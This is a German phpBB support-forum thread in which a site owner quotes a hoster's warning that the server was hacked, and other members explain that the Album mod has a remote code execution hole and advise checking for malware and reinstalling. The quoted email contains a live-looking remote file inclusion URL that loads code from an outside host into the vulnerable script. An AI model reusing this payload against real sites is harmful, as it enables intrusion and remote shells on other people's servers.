Warnhinweis vom Provider

Probleme bei der regulären Arbeiten mit phpBB, Fragen zu Vorgehensweisen oder Funktionsweise sowie sonstige Fragen zu phpBB im Allgemeinen.
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Antworten
nagus
Mitglied
Beiträge: 48
Registriert: 24.01.2006 09:29

Warnhinweis vom Provider

Beitrag von nagus »

Hallo zusammen

Ich habe gerade folgende Mail von meinem Hoster bekommen:
The webserver ***.de resides on has been hacked. I'm
contacting you as you are listed as the technical contact for the
website.

http://***.de/phpbb/album_mod/album_nuffimage_box.php?album_root_path=http://callingplanetearth.org/coo4.zip?

Please ensure there is no malware and/or shells on the server.

Thank you
Was soll ich damit anfangen?
Benutzeravatar
bantu
Server-Team
Beiträge: 7311
Registriert: 25.04.2006 16:12
Wohnort: Karlsruhe

Beitrag von bantu »

Vermutlich enthält dieser Album Mod gravierende Sicherheitslücken und ermöglicht den Versand von Spam über deinen Server.

Siehe auch: KB:gehackt.
Powered by Coffee
Benutzeravatar
larsneo
Mitglied
Beiträge: 2622
Registriert: 07.03.2002 15:23
Wohnort: schwäbisch gmünd
Kontaktdaten:

Beitrag von larsneo »

dein album ermöglicht augenscheinlich eine sog. Remote Code Execution - nachdem man damit (je nach serverkonfiguration) z.b. auch eine remote shell installieren kann ist das eine ernsthafte sicherheitslücke. du solltest gemeinsam mit deinem provider kontrollieren, ob bereits schadcode auf dem system ist und die seite danach neu aufsetzen.

generelle sicherheitsinfos zum system liefert auch phpsecinfo.
gruesse aus dem wilden sueden
larsneo
..::[krapohl.net]::..
Antworten

Zurück zu „phpBB 2.0: Administration, Benutzung und Betrieb“